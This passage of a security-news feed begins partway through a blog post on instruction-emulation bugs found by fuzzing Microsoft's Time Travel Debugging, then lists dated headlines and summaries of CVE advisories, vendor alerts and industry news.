Most notable of these are the Calls and Memory data model methods. CPU Emulation Historically, CPU emulation—particularly for architectures as intricate as x86—has been a persistent source of engineering challenges. Early attempts struggled with instruction coverage and correctness, as documentation gaps and hardware errata made it difficult to replicate every nuanced corner case. Over time, a number of recurring problem areas and bug classes emerged: Floating-Point and SIMD Operations: Floating-point instructions, with their varying precision modes and extensive register states, have often been a source of subtle bugs. Miscalculating floating-point rounding, mishandling denormalized numbers, or incorrectly implementing special instructions like FSIN or FCOS can lead to silent data corruption or outright crashes. Similarly, SSE, AVX, and other vectorized instructions introduce complex states that must be tracked accurately. Memory Model and Addressing Issues: The x86 architecture's memory model, which includes segmentation, paging, alignment constraints, and potential misalignments in legacy code, can introduce complex bugs. Incorrectly emulating memory accesses, not enforcing proper page boundaries, or failing to handle "lazy" page faults and cache coherency can result in subtle errors that only appear under very specific conditions. Peripheral and Device Emulation: Emulating the behavior of x86-specific peripherals—such as serial I/O ports, PCI devices, PS/2 keyboards, and legacy controllers—can be particularly troublesome. These components often rely on undocumented behavior or timing quirks. Misinterpreting device-specific registers or neglecting to reproduce timing-sensitive interactions can lead to erratic emulator behavior or device malfunctions. Compatibility with Older or Unusual Processors: Emulating older generations of x86 processors, each with their own peculiarities and less standardized features, poses its own set of difficulties. Differences in default mode settings, instruction variants, and protected-mode versus real-mode semantics can cause unexpected breakages. A once-working emulator may fail after it encounters code written for a slightly different microarchitecture or an instruction that was deprecated or implemented differently in an older CPU. Self-Modifying Code and Dynamic Translation: Code that modifies itself at runtime demands adaptive strategies, such as invalidating cached translations or re-checking original code bytes on the fly. Handling these scenarios incorrectly can lead to stale translations, misapplied optimizations, and difficult-to-trace logic errors. Performance vs. Accuracy Trade-Offs: Historically, implementing CPU emulators often meant juggling accuracy with performance. Naïve instruction-by-instruction interpretation provided correctness but was slow. Introducing caching or just-in-time (JIT)-based optimizations risked subtle synchronization issues and bugs if not properly synchronized with memory updates or if instruction boundaries were not well preserved. Collectively, these historical challenges underscore that CPU emulation is not just about instruction decoding. It requires faithfully recreating intricate details of processor states, memory hierarchies, peripheral interactions, and timing characteristics. Even as documentation and tooling have improved, achieving both correctness and efficiency remains a delicate balancing act, and emulation projects continue to evolve to address these enduring complexities. The Initial TTD Bug Executing a heavily obfuscated 32-bit Windows Portable Executable (PE) file under TTD instrumentation resulted in a crash. The same sample file did not cause a crash while executing in a real computer or in a virtual machine. We suspected either the sample is detecting TTD execution and or TTD itself has a bug in emulating an instruction. A good thing about debugging TTD issues is that the TTD trace file itself can be used to pinpoint the cause of the issue most of the time. Figure 1 points to the crash while in TTD emulation. Figure 1: Crash while accessing an address pointed by register ESI Back tracing the ESI register value to 0xfb3e took stepping back hundreds of instructions and ended up in the following sequence of instructions, as shown in Figure 2. Figure 2: Register ESI getting populated by pop si and xchg si,bp There are two instructions populating the ESI register, both working with the 16-bit sub register of SI while completely ignoring the other 16-bit part of the ESI register. If we look closely at the results after pop si instruction in Figure 2, the upper 16-bit of the ESI register seems to be nulled out. This looked like a bug in emulating pop r16 instructions, and we quickly wrote a proof-of-concept code for verification (Figure 3). Figure 3: Proof-of-concept for pop r16 Running the resulting binary natively and with TTD instrumentation as shown in Figure 4 confirmed our suspicion that the pop r16 instructions are emulated differently in TTD than on a real CPU. Figure 4: Running the code natively and with TTD instrumentation We reported this issue and the fuzzing results to the TTD team at Microsoft.   Fuzzing TTD Given there is one instruction emulation bug (instruction sequence that produces different results in real vs TTD execution), we decided to fuzz TTD to find similar bugs. A rudimentary harness was created to execute a random sequence of instructions and record the resulting values. This harness was executed on a real CPU and under TTD instrumentation, providing us with two sets of results. Any changes in results or partial lack of results points us to a likely instruction emulation bug. Results Bug 1: PUSH segment Instruction Emulation Discrepancy Figure 5: Proof-of-concept for push segment This new bug was fairly similar to the original pop r16 bug, but with a push segment instruction. This bug also comes with a little bit of twist. While our fuzzer was running on an Intel CPU-based machine and one of us verified the bug locally, the other person was not able to verify the bug. Interestingly, the failure happened on an AMD-based CPU, tipping us to the possibility that the push segment instruction implementation varies between INTEL and AMD CPUs. Looking at both INTEL and AMD CPU specifications, INTEL specification goes into details about how recent processors implement push segment register instruction: If the source operand is a segment register (16 bits) and the operand size is 64-bits, a zero-extended value is pushed on the stack; if the operand size is 32-bits, either a zero-extended value is pushed on the stack or the segment selector is written on the stack using a 16-bit move. For the last case, all recent Intel Core and Intel Atom processors perform a 16-bit move, leaving the upper portion of the stack location unmodified. (INTEL spec Vol.2B 4-517) We reported the discrepancy to AMD PSIRT, who concluded that this is not a security vulnerability. It seems sometime circa 2007 INTEL and AMD CPU started implementing the push segment instruction differently, and TTD emulation followed the old way. Bug 2: lodsb/lodsw Instruction Emulation Discrepancy The lodsb and lodsw are not correctly implemented for both 32-bit and 64-bit instructions. Both clear the upper bits of the register (rax/eax) whereas the original instructions only modify their respective granularities (i.e., lodsb will only overwrite 1-byte, lodsw only 2-bytes). Figure 6: Proof-of-concept for lodsb/lodsw There are additional instruction emulation bugs pending fixes from Microsoft.  Bug 3: Windbg TTDAnalyze Output Capture Truncation As we were pursuing our efforts in the CPU emulator, we accidentally stumbled on another bug, this time not in the emulator but inside the Windbg extension exposed by TTD: TTDAnalyze.dll. This extension leverages the debugger's data model to allow a user to interact with the trace file in an interactive manner. This is done via exposing a TTD data model namespace under certain parts of the data model, such as the current process (@$curproces), the current thread (@$curthread), and current debugging session (@$cursession). Figure 7: TTD query types As an example, the @$cursession.TTD.Calls method allows a user to query all call locations captured within the trace. It takes as input either an address or case-insensitive symbol name with support for regex. The symbol name can either be in the format of a string (with quotes) or parsed symbol name (without quotes). The former is only applicable when the symbols are resolved fully (e.g., private symbols), as the data model has support for converting private symbols into an ObjectTargetObject object thus making it consumable to the dx evaluation expression parser. The bug in question directly affects the exposed Calls method under @$cursession.TTD.Calls because it uses a fixed, static buffer to capture the results of the symbol query. In Figure 8 we illustrate that by passing in two similar regex strings that produce inconsistent results. Figure 8: TTD Calls query When we query C* and Create*, the C* query results do not return the other Create APIs that were clearly captured in the trace. Under the hood, TTDAnalyze executes the examine debugger command "x KERNELBASE!C*" with a custom output capture to process the results. This output capture truncates any captured data if it is greater than 64 KB in size. If we take the disassembly of the global buffer and output capture routine in TTDAnalyze (SHA256 CC5655E29AFA87598E0733A1A65D1318C4D7D87C94B7EBDE89A372779FF60BAD) prior to the fix, we can see the following (Figure 9 and Figure 10): Figure 9: TTD implementation disassembly Figure 10: TTD implementation disassembly The capture for the examine command is capped at 64 KB. When the returned data exceeds this limit, truncation is performed at address 0x180029960. Naturally querying symbols starting with C* typically yields a large volume of results, not just those beginning with Create*, leading to the observed truncation of the data. Final Thoughts The analysis presented in this blog post highlights the critical nature of accuracy in instruction emulation—not just for debugging purposes, but also for ensuring robust security analysis. The observed discrepancies, while subtle, underscore a broader security concern: even minor deviations in emulation behavior can misrepresent the true execution of code, potentially masking vulnerabilities or misleading forensic investigations. From a security perspective, the work emphasizes several key takeaways: Reliability of Debugging Tools: TTD and similar frameworks are invaluable for reverse engineering and incident response. However, any inaccuracies in emulation, such as those revealed by the misinterpretation of pop r16, push segment, or lods* instructions, can compromise the fidelity of the analysis. This raises important questions about trust in our debugging tools when they are used to analyze potentially malicious or critical code. Impact on Threat Analysis: The ability to replay a process's execution with high fidelity is crucial for uncovering hidden behaviors in malware or understanding complex exploits. Instruction emulation bugs may inadvertently alter the execution path or state, leading to incomplete or skewed insights that could affect the outcome of a security investigation. Collaboration and Continuous Improvement: The discovery of these bugs, followed by their detailed documentation and reporting to the relevant teams at Microsoft and AMD, highlights the importance of a collaborative approach to security research. Continuous testing, fuzzing, and cross-platform comparisons are essential in maintaining the integrity and security of our analysis tools. In conclusion, this exploration not only sheds light on the nuanced challenges of CPU emulation within TTD, but also serves as a call to action for enhanced scrutiny and rigorous validation of debugging frameworks. By ensuring that these tools accurately mirror native execution, we bolster our security posture and improve our capacity to detect, analyze, and respond to sophisticated threats in an ever-evolving digital landscape. Acknowledgments We extend our gratitude to the Microsoft Time Travel Debugging team for their readiness and support in addressing the issues we reported. Their prompt and clear communication not only resolved the bugs but also underscored their commitment to keeping TTD robust and reliable. We further appreciate that they have made TTD publicly available—a resource invaluable for both troubleshooting and advancing Windows security research.

https://cloud.google.com/blog/topics/threat-intelligence/ttd-instruction-emulation-bugs/
Network, Learn, Defend: the Dragos Forum Helps to Empower OT Security Professionals
2025-03-10T13:00:00Z | 1741611600

Are you an asset owner or operator in the industrial sector, working to fortify your OT cybersecurity posture against ever-evolving... The post Network, Learn, Defend: the Dragos Forum Helps to Empower OT Security Professionals  first appeared on Dragos.

https://www.dragos.com/blog/network-learn-defend-dragos-forum-helps-to-empower-ot-security-professionals/
AI-driven deception: A new face of corporate fraud
2025-03-10T10:00:00Z | 1741600800

Malicious use of AI is reshaping the fraud landscape, creating major new risks for businesses

https://www.welivesecurity.com/en/cybersecurity/ai-driven-deception-new-face-corporate-fraud/
Why Being a Niche Player Can Be Your Strategic Advantage: The Radiflow Case
2025-03-10T08:41:51Z | 1741596111

In the realm of industrial cybersecurity, being classified as a Niche Player in analysts’ ratings may seem worrisome at first. However, for mid-sized organizations in search of OT security solutions, partnering with a firm like Radiflow can present unique benefits. Here’s why this positioning might actually be your ideal strategy. Understanding Radiflow’s Expertise Radiflow focuses […] The post Why Being a Niche Player Can Be Your Strategic Advantage: The Radiflow Case appeared first on Radiflow.

https://www.radiflow.com/blog/why-being-a-niche-player-can-be-your-strategic-advantage-the-radiflow-case/
Exploiting Neverwinter Nights
2025-03-10T07:49:09Z | 1741592949

https://www.synacktiv.com/en/publications/exploiting-neverwinter-nights.html
ZDI-25-126: (0Day) Ashlar-Vellum Cobalt VS File Parsing Type Confusion Remote Code Execution Vulnerability
2025-03-10T05:00:00Z | 1741582800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2022.

http://www.zerodayinitiative.com/advisories/ZDI-25-126/
Security Alert (A25-03-07): Multiple Vulnerabilities in Microsoft Edge
2025-03-10T04:00:00Z | 1741579200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-03-08): Multiple Vulnerabilities in QNAP Products
2025-03-10T04:00:00Z | 1741579200

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Unlock the Full Potential of Your Cato SASE with DEM
2025-03-09T09:46:52Z | 1741513612

The post Unlock the Full Potential of Your Cato SASE with DEM appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-your-cato-sase-with-dem
Testing SASE Security (For Real)
2025-03-09T09:43:28Z | 1741513408

The post Testing SASE Security (For Real) appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-testing-sase-security
Accelerating Action on Gender Equality: A Message from Ivanti’s Brooke Johnson on International Women’s Day
2025-03-08T05:01:01Z | 1741410061

International Women’s Day is March 8, 2025. This year’s theme is “Accelerate Action.” As things currently stand, data from the World Economic Forum indicate that it will be 2158 until we reach full gender parity. That’s roughly five generations from now. I believe that’s five – maybe even six or seven -- generations too long.  I also believe the generations that came before me would agree. Every day, but particularly on International Women's Day, I am so grateful to have grown up surrounded by strong female role models. Even if I didn't realize it at the time, these women shaped my understanding of leadership and possibility.  The influence of strong women in my life didn't stop after childhood. Far from it. My best friend Beth, whom I met in law school, helped define my approach to career and advocacy. Beth and I bonded initially over academics (and our shared love of shoes), but she quickly became my career counselor, personal advocate and sometimes therapist. Through her example as an exceptional attorney who effectively prioritizes what matters most, she taught me a crucial lesson that I’ve shared often. Still, it’s worth repeating: It’s okay to not always say you can “have it all.” Instead, do your best at whatever you choose to take on.  I want every girl and every woman to feel the support, encouragement and advocacy I felt. That’s not to say it was smooth sailing, particularly given my choice to enter male-dominated fields. It’s not enough to be aware of the gaps and lack of equality for women. We need action.   That’s why I’m so excited about this year's theme for International Women’s Day, "Accelerate Action.” This theme challenges us to move beyond awareness to create tangible change. According to the International Women’s Day site, this year’s theme “emphasizes the importance of taking swift and decisive steps to achieve gender equality. It calls for increased momentum and urgency in addressing the systemic barriers and biases that women face in both personal and professional spheres.”  So, let’s talk about some of the ways we’re accelerating action.  Connecting to champion change  As the initial advocate for Ivanti's Women's Connection group, I've witnessed firsthand how creating spaces for authentic dialogue drives meaningful change. While our content focuses on helping women navigate their career journeys, our group welcomes everyone — regardless of gender identity. This inclusivity strengthens our ability to address the unique challenges women face in the workplace and create solutions that benefit all.  The objective of our Women's Connection group is straightforward yet powerful: to inspire and foster the growth and development of Ivantians. By connecting women with other women, as well as creating a safe space for men and women to have dialogue about important topics, we're creating a support network that helps group members navigate career challenges and opportunities with greater confidence and clarity.  Strength in numbers  Numbers tell part of our story of progress. In 2023, women represented 24% of our new hires at Ivanti — matching industry benchmarks. Through focused, intentional action, we've increased that to 31% in 2024. There is more work to be done, but this shows that our intentional actions are paying off. We implemented specific strategies, including:  Ensuring at least one female candidate appears on every shortlist when possible.  Revising job descriptions to use gender-neutral language, recognizing how certain terms like "aggressive" might discourage female applicants.  Highlighting benefits that appeal to diverse candidates such as flexible schedules and remote work options.  The impact of everyday excellence  What inspires me most about the women I work with is their incredible resilience and supportive nature. Each day, I witness the profound impact we can have on one another by uplifting each other, actively listening to one another's challenges and solving problems collaboratively. Our mutual support influences my approach to both leadership and advocacy.  The diverse perspectives and innovative solutions that arise from our discussions have taught me the invaluable lesson of inclusive dialogue. As a leader, this has reinforced the importance of not just taking input but genuinely understanding and integrating different viewpoints. It has made me more empathetic, reflective and adaptive in my decision-making process.  It takes all of us  Women should not be alone in the push for change. I’m grateful that, at Ivanti, we have the unwavering partnership of our male allies and our CEO, who consistently champion gender equality. Their advocacy, combined with the courage, wisdom and excellence of our women executives and team members throughout Ivanti, creates a powerful force for change. I can’t emphasize enough that it takes all of us. That includes you, the person reading this. The path forward requires collective effort, sustained commitment and accelerated action. I invite you to consider: How will you contribute to creating a more equitable future for girls and women? Every action, every connection and every opportunity to support women's advancement brings us further on the path. This International Women’s Day, and every day, I’m taking on the challenge — and channeling my friend Beth by choosing to do my best.

https://www.ivanti.com/blog/international-womens-day-2025
Ministry of Technology and Science of Zambia and Huawei Jointly Launch the Global Smart Village Showcase, Exploring New Digital Transformation Modes for Villages
2025-03-07T20:00:00Z | 1741377600

During the MWC Barcelona 2025, the Ministry of Technology and Science of Zambia joined hands with Huawei in launching the global showcase of Zambia's smart village at the government industry forum titled Secured

//www.huawei.com/en/news/2025/3/mwc-smart-village-showcase
5G-Advanced Unleashes Mobile AI Potential with Quality Connections
2025-03-07T19:00:00Z | 1741374000

At MWC 2025 in Barcelona, Huawei held its "5G-Advanced Industry Evolution" summit.

//www.huawei.com/en/news/2025/3/mwc-5ga-industry-summit
Building AI-ready service providers
2025-03-07T15:56:00Z | 1741362960

In a panel discussion at Mobile World Congress, experts explore the rich opportunities and deep challenges of AI in the telco space. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/building-ai-ready-service-providers.html
Building AI-ready service providers
2025-03-07T15:56:00Z | 1741362960

In a panel discussion at Mobile World Congress, experts explore the rich opportunities and deep challenges of AI in the telco space. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/building-ai-ready-service-providers.html
Building AI-ready service providers
2025-03-07T15:56:00Z | 1741362960

In a panel discussion at Mobile World Congress, experts explore the rich opportunities and deep challenges of AI in the telco space. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/building-ai-ready-service-providers.html
China Unicom Guangdong, Gree, and Huawei Win GSMA GLOMO's "Best Private Network Solution" and "Best Mobile Innovation for Connected Economy" Awards
2025-03-07T15:52:00Z | 1741362720

At Mobile World Congress (MWC) Barcelona 2025, China Unicom Guangdong, Gree, and Huawei took home the GSMA Global Mobile (GLOMO) Awards "Best Private Network Solution" and "Best Mobile Innovation for Connected Economy" for their building the 5.5G "lights-out" factory with the 5.5G native private network solution.

//www.huawei.com/en/news/2025/3/mwc-best-private-network-solution
Magecart: How Akamai Protected a Global Retailer Against a Live Attack
2025-03-07T13:00:00Z | 1741352400

https://www.akamai.com/blog/security/2025/mar/how-akamai-protected-global-retailer-against-live-attack
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 09/2025
2025-03-07T12:20:53Z | 1741350053

This week, we will discuss, among other things, how to recycle old devices securely. Additionally, we will cover contingency plans for cable damages, scams occurring on online platforms, and fraudulent phone calls made in the name of the NCSC-FI.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-092025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 09/2025
2025-03-07T12:20:53Z | 1741350053

This week, we will discuss, among other things, how to recycle old devices securely. Additionally, we will cover contingency plans for cable damages, scams occurring on online platforms, and fraudulent phone calls made in the name of the NCSC-FI.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-092025
SparkCat: Proof That iOS Is Not Immune to Malware
2025-03-07T10:35:01Z | 1741343701

Researchers have recently discovered SparkCat, a malware that targets smartphone users by exploiting their screenshots to extract sensitive data. This malicious program was recently detected in applications available on the App Store and Google Play, highlighting the limitations of these platforms’ security controls.

https://blog.pradeo.com/sparkcat-proof-that-ios-is-not-immune-to-malware
Robots Refresher: robots.txt - a flexible way to control how machines explore your website
2025-03-07T10:00:00Z | 1741341600

A long-standing tool for website owners, robots.txt has been in active use for over 30 years and is broadly supported by crawler operators (such as tools for site owners, services, and search engines). In this edition of the robots refresher series, we'll take a closer look at robots.txt as a flexible way to tell robots what you want them to do (or not do) on your website.

https://developers.google.com/search/blog/2025/03/robotstxt-flexible-way-to-control
Veebruar Eesti küberruumis: tooni andsid õngitsused ja pettused
2025-03-07T08:54:42Z | 1741337682

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub, et veebruaris 2025 registreeriti Eestis 909 mõjuga küberintsidenti, millest valdava osa moodustasid õngitsus- ja petulehed.

https://ria.ee/uudised/veebruar-eesti-kuberruumis-tooni-andsid-ongitsused-ja-pettused
Chromium: CVE-2025-1915 Improper Limitation of a Pathname to a Restricted Directory in DevTools
2025-03-07T08:00:58Z | 1741334458

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1915
Chromium: CVE-2025-1914 Out of bounds read in V8
2025-03-07T08:00:54Z | 1741334454

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1914
Chromium: CVE-2025-1923 Inappropriate Implementation in Permission Prompts
2025-03-07T08:00:20Z | 1741334420

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1923
Chromium: CVE-2025-1922 Inappropriate Implementation in Selection
2025-03-07T08:00:17Z | 1741334417

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1922
Chromium: CVE-2025-1921 Inappropriate Implementation in Media Stream
2025-03-07T08:00:13Z | 1741334413

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1921
Chromium: CVE-2025-1919 Out of bounds read in Media
2025-03-07T08:00:10Z | 1741334410

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1919
Chromium: CVE-2025-1918 Out of bounds read in PDFium
2025-03-07T08:00:07Z | 1741334407

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1918
Chromium: CVE-2025-1917 Inappropriate Implementation in Browser UI
2025-03-07T08:00:04Z | 1741334404

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1917
Chromium: CVE-2025-1916 Use after free in Profiles
2025-03-07T08:00:01Z | 1741334401

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2025) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1916
CVE-2025-26643 Microsoft Edge (Chromium-based) Spoofing Vulnerability
2025-03-07T08:00:00Z | 1741334400

No cwe for this issue in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26643
GreyNoise Detects Mass Exploitation of Critical PHP-CGI Vulnerability (CVE-2024-4577), Signaling Broad Campaign
2025-03-07T00:00:00Z | 1741305600

‍GreyNoise data confirms that exploitation of CVE-2024-4577 extends far beyond initial reports. Attack attempts have been observed across multiple regions, with notable spikes in the United States, Singapore, Japan, and other countries throughout January 2025.

https://www.greynoise.io/blog/mass-exploitation-critical-php-cgi-vulnerability-cve-2024-4577
MTN and Huawei signed an MoU to collaborate on the digital future for Africa
2025-03-06T22:28:00Z | 1741300080

At Mobile World Congress 2025, MTN Group and Huawei reaffirmed their long-term collaboration through a strategic Memorandum of Understanding (MoU).

//www.huawei.com/en/news/2025/3/mwc-mtn-mou-africa
Huawei GigaGear Wins GSMA GLOMO Best Mobile Technology Breakthrough Award
2025-03-06T21:54:00Z | 1741298040

During the 2025 Mobile World Congress (MWC 2025), Huawei's GigaGear solution was awarded the GSMA Global Mobile (GLOMO) Award for 'Best Mobile Technology Breakthrough'.

//www.huawei.com/en/news/2025/3/mwc-best-technology-breakthrough
China Mobile Qinghai and Huawei's RuralStar Plus Wins GSMA GLOMO "Best Mobile Innovation for Emerging Markets"
2025-03-06T21:40:00Z | 1741297200

At Mobile World Congress (MWC) 2025, China Mobile Qinghai and Huawei won the GSMA Global Mobile Award (GLOMO) "Best Mobile Innovation for Emerging Markets" for their RuralStar Plus solution.

//www.huawei.com/en/news/2025/3/mwc-best-mobile-innovation-emerging-markets
Huawei Wins GSMA GLOMO 'Best Mobile Network Infrastructure' for GigaGreen Radio
2025-03-06T21:09:00Z | 1741295340

At Mobile World Congress (MWC) 2025, Huawei's GigaGreen Radio series products grabbed the GSMA Global Mobile (GLOMO) Award "Best Mobile Network Infrastructure".

//www.huawei.com/en/news/2025/3/mwc-gigagreen--best-network-infrastructure
Cyber supply chain security for small and medium-sized organizations (ITSAP.00.070)
2025-03-06T19:46:02Z | 1741290362

https://cyber.gc.ca/en/guidance/cyber-supply-chain-security-small-medium-sized-organizations-itsap00070
Rethinking Open Source Vulnerability Management: 5 Strategies to Build Resilience in Embedded Systems
2025-03-06T15:52:01Z | 1741276321

This is a guest post by Lynx. RunSafe Security and Lynx are partners in securing embedded software platforms. For too long, open source vulnerability management has been treated as a reactive game of whack-a-mole: identify vulnerabilities, patch them, and repeat. This approach often leaves teams overwhelmed and constantly playing catch-up.  What if we flipped the […] The post Rethinking Open Source Vulnerability Management: 5 Strategies to Build Resilience in Embedded Systems appeared first on RunSafe Security.

https://runsafesecurity.com/blog/open-source-vulnerability-management/
Communications Security Establishment Canada releases 2025 update to report on cyber threats to Canada’s democratic process
2025-03-06T15:20:04Z | 1741274404

https://www.canada.ca/en/communications-security/news/2025/03/communications-security-establishment-canada-releases-2025-update-to-report-on-cyber-threats-to-canadas-democratic-process.html
Cyber Threats to Canada's Democratic Process: 2025 Update
2025-03-06T14:45:00Z | 1741272300

https://cyber.gc.ca/en/guidance/cyber-threats-canadas-democratic-process-2025-update
STMicroelectronics Integrates Black Duck SCA and Coverity for Automated SBOM Generation and Enhanced Software Security
2025-03-06T14:00:00Z | 1741269600

Black Duck® Software, Inc. ("Black Duck"), a leading provider of application security solutions, today announced that STMicroelectronics (NYSE:STM), a global semiconductor leader serving...

https://news.blackduck.com/2025-03-06-STMicroelectronics-Integrates-Black-Duck-SCA-and-Coverity-for-Automated-SBOM-Generation-and-Enhanced-Software-Security
Healthcare Data Breaches: A Preventable Nightmare with Packet Data
2025-03-06T14:00:00Z | 1741269600

Your hospital’s systems are down. Critical patient records are locked. Doctors and nurses are struggling to access life-saving information, and the phones won’t stop ringing. A ransomware attack has crippled your network, and the attackers are demanding millions to restore access. But how did it happen? To truly...

https://www.netscout.com/blog/healthcare-data-breaches-preventable-nightmare-packet-data
Cryptographic algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B information - ITSP.40.111
2025-03-06T12:58:42Z | 1741265922

https://cyber.gc.ca/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111
Vulnerabilities in Smartwares cameras
2025-03-06T11:00:00Z | 1741258800

CERT Polska has received a report about 3 vulnerabilities (from CVE-2024-13892 to CVE-2024-13894) found in Smartwares cameras.

https://cert.pl/en/posts/2025/03/CVE-2024-13892/
State of Managed Security services: How MSSPs can Capture New Business
2025-03-06T10:21:19Z | 1741256479

European organizations need help managing their cybersecurity. With a threat landscape constantly developing, threats becoming more difficult to detect, and an expanding regulatory landscape, that may come as no surprise. In fact, 23% of organizations that manage security on their own today consider outsourcing. To help discover how MSSPs can capture business opportunities, Logpoint [...] The post State of Managed Security services: How MSSPs can Capture New Business appeared first on Logpoint.

https://www.logpoint.com/en/blog/state-of-managed-security-services-how-mssps-can-capture-new-business/
Vulnerability Scanning: Keeping on top of the most common threats
2025-03-06T08:40:53Z | 1741250453

Vulnerability Scanning solutions offer a cost-effective way to discover and manage common security issues.

https://www.ncsc.gov.uk/blog-post/vulnerability-scanning-keeping-on-top-of-the-most-common-threats
Benchmarking OpenSearch and Elasticsearch
2025-03-06T05:00:00Z | 1741237200

This post concludes a four-month performance study of OpenSearch and Elasticsearch search engines across realistic scenarios using OpenSearch Benchmark (OSB). Our full report includes the detailed findings and comparison results of several versions of these two applications.

https://blog.trailofbits.com/2025/03/06/benchmarking-opensearch-and-elasticsearch/
High Threat Security Alert (A25-03-03): Multiple Vulnerabilities in VMware Products
2025-03-06T04:00:00Z | 1741233600

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-03-04): Multiple Vulnerabilities in Firefox
2025-03-06T04:00:00Z | 1741233600

Mozilla has published the advisories (MFSA2025-14, MFSA2025-15, MFSA2025-16, MFSA2025-17 and MFSA2025-18) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-03-05): Multiple Vulnerabilities in Google Chrome
2025-03-06T04:00:00Z | 1741233600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-03-06): Multiple Vulnerabilities in Cisco Products
2025-03-06T04:00:00Z | 1741233600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
GreyNoise Detects Active Exploitation of Silk Typhoon-Linked CVEs
2025-03-06T00:00:00Z | 1741219200

Silk Typhoon-linked CVEs are under active exploitation. GreyNoise observed 90+ threat IPs exploiting them in the past 24 hours, following Microsoft’s report on the group's evolving tactics.

https://www.greynoise.io/blog/active-exploitation-silk-typhoon-linked-cves
The DNS Line of Defense When Others Fail
2025-03-05T22:10:25Z | 1741212625

When high-profile breaches like the one involving the U.S. Department of Treasury and the various Typhoon-related attacks make headlines, it serves as yet another stark reminder of the increasingly relentless and sophisticated nature of cyberthreats. Cybersecurity professionals know that even the most well-prepared organizations can fall victim to an advanced threat actor. These examples make it clear—cybersecurity defenses cannot afford to be singular or static. Among the many layers of protection that organizations employ, one often underappreciated but highly critical component is DNS. This post examines how protective DNS solutions like HYAS Protect function as an essential layer of the “defense in depth” strategy and why smart cybersecurity leaders consider it indispensable for safeguarding their organizations. Why Cybersecurity Needs Multiple Layers Modern threat actors are more numerous, persistent, and adaptable than ever before, often leveraging both technical vulnerabilities and human error. No single security solution is capable of addressing every potential exploit, vector, or weakness. That’s where the concept of “defense in depth” becomes essential. Defense in depth is a layered security approach designed to provide multiple barriers between an attacker and your organization's most critical assets. Even if one layer is compromised—think firewalls, endpoint detection and response (EDR), or other technologies—the other defensive mechanisms remain, providing resilience against threats. DNS-based protection through HYAS Protect serves as an essential line of defense when other measures fail. If and when attackers bypass other lines of defense, safeguards you have in place that incorporate DNS can still stop attackers in their tracks. The Critical Role of the DNS Line of Defense The Domain Name System (DNS) translates domain names into IP addresses, directing web traffic to its intended destinations. HYAS Protect inspects every DNS transaction in real time, making it both a first and last line of defense. The first line of defense is “content 